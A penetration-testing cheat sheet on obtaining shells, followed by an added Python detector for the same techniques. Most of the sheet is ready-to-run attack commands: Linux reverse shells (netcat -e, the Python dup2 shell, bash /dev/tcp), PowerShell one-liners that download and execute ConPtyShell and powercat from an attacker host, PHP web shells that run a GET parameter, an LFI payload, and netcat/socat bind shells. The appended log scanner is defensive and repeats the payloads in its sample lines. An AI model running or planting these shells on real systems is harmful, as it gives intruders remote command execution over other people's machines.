Shells
Reverse Shell Generation
Resources
- https://revshells.com — generate shells with a given port and IP (change shell from cmd to /bin/bash as needed)
Linux Shells
Busybox netcat:
busybox nc $kaliIP $kaliPort -e sh
Python reverse shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$kaliIP",$kaliPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Bash:
bash -c "bash -i >& /dev/tcp/$kaliIP/$kaliPort 0>&1"
# URL encoded for use in curl/web shell:
bash+-c+"bash+-i+>%26+/dev/tcp/$kaliIP/$kaliPort+0>%261"
Windows Shells
ConPtyShell (fully interactive Windows shell):
powershell IEX(IWR http://$kaliIP/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell $kaliIP $kaliPort
Requires serving Invoke-ConPtyShell.ps1 from port 80.
Reference: https://github.com/antonioCoco/ConPtyShell/blob/master/README.md
Powercat:
IEX(New-Object System.Net.WebClient).DownloadString('http://$kaliIP/powercat.ps1'); powercat -c $kaliIP -p $kaliPort -e powershell
Requires serving powercat.ps1 from port 80.
Web Shells
PHP simple web shell:
<?php echo shell_exec($_GET['cmd']); ?>
Usage: http://target.com/shell.php?cmd=whoami
PHP system web shell:
<?php system($_GET['cmd']); ?>
LFI PHP wrapper:
http://[IP]/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
Upgrading to Fully Interactive Shell
Python PTY Method
Quick version:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Full method (preserves screen size, arrow keys, CTRL+C, etc.):
# Step 1: Spawn PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Step 2: Background the shell
CTRL+Z
# Step 3: Get your terminal settings (note TERM and rows/columns)
echo $TERM
stty -a
# Step 4: Configure raw mode
stty raw -echo
# Step 5: Bring shell back to foreground
fg
# Step 6: Reset and export settings (use values from stty -a)
reset
export SHELL=/bin/bash
export TERM=xterm-256color
stty rows 38 columns 116
One-liner version (inside nc session):
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then:
CTRL+Z; stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 36 columns 102; reset;
Socat Method
On Kali (listener):
sudo socat file:`tty`,raw,echo=0 tcp-listen:443
On target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$kaliIP:443
Reference: https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys
Bind Shells
Bind shells listen on the target and accept incoming connections (useful when outbound connections are blocked).
Netcat bind shell (Linux):
nc -lvnp $port -e /bin/bash
Netcat bind shell (Windows):
nc -lvnp $port -e cmd.exe
Connect from attacker:
nc $targetIP $port
Socat bind shell:
# Target
socat tcp-listen:$port,reuseaddr exec:/bin/bash
# Attacker
socat tcp:$targetIP:$port -
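Added example, not part of the original cheat sheet: a Python scanner that flags the shell patterns listed above (the /dev/tcp redirect, nc/busybox -e, socat exec:, the dup2 Python shell, pty.spawn, PHP $_GET command execution, and the PowerShell download-and-execute one-liners) in process-audit and web-access log lines. Each line is also checked in URL-decoded form so the encoded bash payload from the web-shell section is caught as a web server would log it. The rule labels, sample log lines and 192.0.2.x addresses are constructed for the example.

```python
"""Flag the shell-spawning patterns from this cheat sheet in command/web log lines."""
import re
from urllib.parse import unquote_plus

# Detection rules, one per technique listed above: (label, pattern).
RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/tcp/")),
    ("nc-exec", re.compile(r"\bnc\b[^|;]*\s-e\s")),
    ("socat-exec", re.compile(r"\bsocat\b.*\bexec:")),
    ("python-fd-dup-shell", re.compile(r"os\.dup2\(.*(/bin/sh|/bin/bash)")),
    ("pty-spawn", re.compile(r"pty\.spawn\(")),
    ("php-cmd-param", re.compile(r"(shell_exec|system)\s*\(\s*\$_(GET|POST|REQUEST)")),
    ("ps-download-exec", re.compile(r"\b(IEX|Invoke-Expression)\b.*(IWR|Invoke-WebRequest|DownloadString)", re.I)),
]

# Constructed sample events (process audit lines plus one web access-log line); not real data.
SAMPLE_LOG = [
    "uid=1000 cmd=python3 manage.py runserver",
    'uid=33 cmd=bash -c "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"',
    "uid=33 cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.0.2.10\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
    "uid=33 cmd=busybox nc 192.0.2.10 4444 -e sh",
    # Fully URL-encoded bash payload as an HTTP server logs the request line.
    "GET /shell.php?cmd=bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.0.2.10%2F4444+0%3E%261%22 HTTP/1.1 200",
    "uid=33 cmd=python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "uid=33 cmd=socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.0.2.10:443",
    "host=WS01 cmd=powershell IEX(IWR http://192.0.2.10/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.0.2.10 4444",
    "uid=33 cmd=nc -lvnp 4444 -e /bin/bash",
    "uid=1000 cmd=nc -zv db.internal 5432",  # benign port check, must not trigger nc-exec
]


def classify(line):
    """Return the labels of every rule matching the raw line or its URL-decoded form
    (the encoded payload in a web log only matches after decoding)."""
    variants = (line, unquote_plus(line))
    return [label for label, pat in RULES if any(pat.search(v) for v in variants)]


def scan(lines):
    """Map line index -> matched labels for every line that triggered a rule."""
    return {i: labels for i, line in enumerate(lines) if (labels := classify(line))}


if __name__ == "__main__":
    for i, labels in scan(SAMPLE_LOG).items():
        print(f"[{','.join(labels)}] {SAMPLE_LOG[i]}")
```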